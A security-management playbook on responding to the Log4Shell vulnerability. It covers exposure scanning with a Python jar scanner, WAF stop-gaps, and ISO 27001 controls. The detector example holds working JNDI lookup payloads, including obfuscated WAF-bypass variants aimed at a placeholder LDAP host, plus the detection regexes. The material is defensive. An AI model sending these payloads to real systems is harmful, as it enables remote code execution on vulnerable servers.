iso27diy-corp/Corpus/Information Security/Dealing with a reported application vulnerability.md


Dealing with a reported application vulnerability

Context

A vulnerability in a widely used open source library is published.

This is based on the Log4j vulnerability ("Log4Shell"), December 2021, CVE-2021-44228.

Log4j is a Java logging library maintained by the Apache Software Foundation and one of the most widely used logging libraries for Java.

The vulnerability: Log4j 2 (versions 2.0-beta9 up to and including 2.14.1) evaluates lookups inside logged messages. If attacker-controlled input containing a JNDI lookup such as ${jndi:ldap://attacker-host/x} is logged, Log4j connects to that server and can be made to load and execute attacker-supplied code (remote code execution, RCE). Disabling logging of that input, while as a rule undesirable, closes the hole; the vendor fix is to upgrade, or to remove the JndiLookup class from the log4j-core jar where upgrading is not yet possible. Source: https://logging.apache.org/log4j/2.x/

This means an unauthenticated attacker (no login required) can run arbitrary code on the server simply by sending a request with the lookup string in any field that ends up in a log: a User-Agent header, a URL parameter, a username, and so on.

Steps

1. Identifying exposure

  • search your source code repositories for the name of the library
  • use dependency tools (Software Composition Analysis, SCA) to identify indirect (transitive) use of the affected library, for example GitHub's dependency graph and Dependabot, Snyk, OWASP Dependency-Check, WhiteSource, etc. These tools only see declared dependencies; a copy bundled ("shaded") into another artifact or copied onto a server by hand is missed, so also scan deployed file systems and container images for the library itself
  • not all versions are affected, so check which version you are using (for CVE-2021-44228: 2.0-beta9 up to and including 2.14.1; the 2.12.2 and 2.3.1 backports for Java 7 and Java 6 are fixed)
  • find out whether the vulnerable code is actually deployed; if it is not, mark it as "do not deploy" until it is patched. If it is, find out where (which hosts, containers and environments).
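A scanner for the last three points above, added here as a worked example (it is not from the original page or from the Apache project): it walks a directory tree, opens every jar/war/ear, recurses into nested jars, reads the log4j-core version from the Maven pom.properties, checks whether the JndiLookup class is still present, and applies the CVE-2021-44228 version range including the Java 6/7 backports. It assumes the standard Maven layout inside the jar (a shaded or relocated jar can move those paths, in which case it only reports the class as present with an unknown version). The demo() function builds constructed fake jars in a temporary directory; they are not real Log4j builds.

```python
import io
import os
import re
import sys
import zipfile

# Paths inside a log4j-core jar in the standard Maven layout (assumption: not relocated/shaded).
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear", ".zip")


def parse_version(v):
    """'2.14.1' -> (2, 14, 1, 2, 0); '2.0-beta9' -> (2, 0, 0, 0, 9); None if unparseable.
    Pre-release rank orders alpha < beta < rc < final release."""
    m = re.fullmatch(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?", v.strip())
    if not m:
        return None
    major, minor, patch, tag, num = m.groups()
    rank = {"alpha": -1, "beta": 0, "rc": 1, None: 2}[tag]
    return (int(major), int(minor), int(patch or 0), rank, int(num or 0))


def affected_by_cve_2021_44228(version):
    """True/False for the Apache-published range; None when the version string cannot be parsed."""
    key = parse_version(version)
    if key is None:
        return None
    major, minor, patch = key[:3]
    if major != 2:
        return False            # Log4j 1.x has no message lookups (it has other issues, not this CVE)
    if key < (2, 0, 0, 0, 9):
        return False            # the JNDI lookup was introduced in 2.0-beta9
    if key > (2, 14, 1, 2, 0):
        return False            # 2.15.0 and later are fixed for this CVE
    if minor == 12 and patch >= 2:
        return False            # 2.12.2+ is the fixed backport for Java 7
    if minor == 3 and patch >= 1:
        return False            # 2.3.1+ is the fixed backport for Java 6
    return True


def inspect_archive(data, name):
    """Findings for one archive (bytes), recursing into jars nested inside wars/ears."""
    findings = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with zf:
        names = set(zf.namelist())
        has_class = JNDI_CLASS in names
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.M)
            version = m.group(1).strip() if m else "unknown"
            findings.append({"archive": name, "version": version, "jndi_lookup_present": has_class,
                             # a jar whose JndiLookup class was deleted is mitigated whatever its version
                             "affected": affected_by_cve_2021_44228(version) and has_class})
        elif has_class:   # class present but no Maven metadata (e.g. shaded): version unknown, still suspect
            findings.append({"archive": name, "version": "unknown", "jndi_lookup_present": True, "affected": None})
        for inner in names:
            if inner.lower().endswith(ARCHIVE_EXT):
                findings.extend(inspect_archive(zf.read(inner), f"{name}!{inner}"))
    return findings


def scan_tree(root):
    """Walk a directory (a deployed app, an unpacked container image) and inspect every archive in it."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for f in files:
            if f.lower().endswith(ARCHIVE_EXT):
                path = os.path.join(dirpath, f)
                with open(path, "rb") as fh:
                    findings.extend(inspect_archive(fh.read(), path))
    return findings


def demo():
    """Constructed sample: fake jars (metadata only, no real classes) in a temp dir, keyed by relative path."""
    import tempfile
    root = tempfile.mkdtemp(prefix="log4j-scan-")
    os.makedirs(os.path.join(root, "lib"))

    def fake_jar(path, version, with_class):
        with zipfile.ZipFile(path, "w") as zf:
            if version:
                zf.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
            if with_class:
                zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only; constructed

    fake_jar(os.path.join(root, "lib", "log4j-core-2.14.1.jar"), "2.14.1", True)           # vulnerable
    fake_jar(os.path.join(root, "lib", "log4j-core-2.17.1.jar"), "2.17.1", True)           # patched
    fake_jar(os.path.join(root, "lib", "log4j-core-2.14.1-stripped.jar"), "2.14.1", False) # class removed
    inner = os.path.join(root, "inner.jar")
    fake_jar(inner, "2.12.1", True)                                                        # vulnerable, nested
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.write(inner, "WEB-INF/lib/log4j-core-2.12.1.jar")
    os.remove(inner)
    return {f["archive"][len(root) + 1:]: f for f in scan_tree(root)}


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for f in scan_tree(target):
        print(f"{f['archive']}: version={f['version']} JndiLookup={f['jndi_lookup_present']} affected={f['affected']}")
```

Run it against an unpacked container image or an application's lib directory; a finding with affected=None (class present, version unknown) deserves a manual look rather than being dismissed.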

2. Stopping the gap

  • If the vulnerable system sits behind a Web Application Firewall (WAF) or Content Delivery Network (CDN), or if you are using Runtime Application Self-Protection (RASP), add the rules your vendor provides to block the attack.
  • If your vendor does not have rules available, search for them on the internet or write a regex that blocks the attack. Be aware that a simple pattern such as ${jndi: is trivially bypassed by nested lookups (for example ${${lower:j}ndi:...}), so treat WAF rules as a stop-gap that buys time, not as a fix.
  • Monitor to make sure the rules are working, and watch for attempts that get through.
  • Update/patch the library containing the vulnerability as soon as a fixed version becomes available, and re-scan afterwards: the first fix (2.15.0) was itself incomplete and was followed by 2.16.0 and 2.17.x.
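The detection logic behind the WAF caveat above, added here as a worked example (not code from the original page or from any WAF vendor): it runs a naive ${jndi: signature and a normalizing detector side by side over constructed access-log lines. The normalizer resolves the lookups Log4j itself would evaluate first (${lower:X}, ${upper:X}, and the default-value form ${name:-default}, including the empty-key ${::-X} trick) from the innermost outwards, then matches the result case-insensitively. The log lines and IP addresses (documentation ranges) are constructed, not captured traffic.

```python
import re

# Innermost ${...} lookup: no further "$", "{" or "}" inside the braces.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# What remains once the obfuscation layers are resolved.
JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# The naive first-day signature that many rules started with.
NAIVE = re.compile(r"\$\{jndi:")


def normalize(text, max_rounds=32):
    """Resolve lower:/upper:/default-value lookups from the innermost outwards until nothing changes.
    Unknown lookups (jndi: itself, or an app's own ${placeholder}) are left in place."""
    for _ in range(max_rounds):
        changed = False

        def resolve(m):
            nonlocal changed
            body = m.group(1)
            key = body.lower()                 # Log4j lookup names are case-insensitive
            if key.startswith("lower:"):
                changed = True
                return body[len("lower:"):].lower()
            if key.startswith("upper:"):
                changed = True
                return body[len("upper:"):].upper()
            if ":-" in body:                   # ${env:X:-j} or ${::-j}: unresolved key falls back to the default
                changed = True
                return body.split(":-", 1)[1]
            return m.group(0)

        text = INNERMOST.sub(resolve, text)
        if not changed:
            break
    return text


def classify(line):
    """(naive_hit, normalized_hit) for one log line."""
    return bool(NAIVE.search(line)), bool(JNDI.search(normalize(line)))


# Constructed sample access-log lines (RFC 5737 documentation addresses); not real traffic.
SAMPLE_LOG = [
    # benign request
    '198.51.100.20 - - [10/Dec/2021:13:02:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    # plain payload in the User-Agent
    '198.51.100.21 - - [10/Dec/2021:13:02:12 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"',
    # lower: lookup splits the word jndi
    '198.51.100.22 - - [10/Dec/2021:13:02:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:ldap://203.0.113.7:1389/a}"',
    # empty-key default value, one letter at a time
    '198.51.100.23 - - [10/Dec/2021:13:02:14 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:ldap://203.0.113.7:1389/a}"',
    # mixed case, env default for the colon, protocol obfuscated too, delivered in the query string
    '198.51.100.24 - - [10/Dec/2021:13:02:15 +0000] "GET /?q=${${env:NaN:-j}NDI${env:NaN:-:}${lower:L}dap://203.0.113.7:1389/a} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    # a ${...} that is not an attack: an application template placeholder logged verbatim
    '198.51.100.25 - - [10/Dec/2021:13:02:16 +0000] "POST /order HTTP/1.1" 200 88 "-" "price=${amount}"',
]


def scan(lines=SAMPLE_LOG):
    """[(line_index, naive_hit, normalized_hit), ...] over a list of log lines."""
    return [(i, *classify(line)) for i, line in enumerate(lines)]


if __name__ == "__main__":
    for i, naive, norm in scan():
        print(f"line {i}: naive={'HIT ' if naive else 'miss'} normalized={'HIT' if norm else 'miss'}")
```

On the sample, the naive rule fires on one of the four malicious lines; the normalizer catches all four and stays quiet on the two benign ones. It only resolves three lookup types, and Log4j supports more (sys:, date:, java: and others), so even this detector is a stop-gap: use it to measure what the WAF misses and to hunt for attempts in logs already written, not as proof that nothing got through.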

3. If you can't stop the gap

Do an impact analysis and identify a treatment:

  • Option 1: Accept the risk, keep monitoring the situation and spend your efforts on releasing the upgraded version of your software a.s.a.p.
  • Option 2: Avoid the risk by shutting down the vulnerable systems immediately; in this example (Log4j), stop logging temporarily.
  • Option 3: Mitigate the risk by going through your code base, removing the dependency and commenting out the code that calls it (uncomment it when the upgrade/patch has been applied). For Log4j specifically, the vendor also documents removing the JndiLookup class from the log4j-core jar on the affected systems, which disables the vulnerable lookup without touching your own code.

Relevant ISO 27001 controls

The main control of interest here is ISO 27001 A.12.6.1 Management of technical vulnerabilities, which requires timely awareness of vulnerabilities (supported by ISO 27001 A.6.1.4 Contact with special interest groups), evaluation of the organization's exposure, and established ISO 27001 A.16.1.1 Responsibilities and procedures to enable a quick and effective response.

Stopping the gap:

Preventative measures: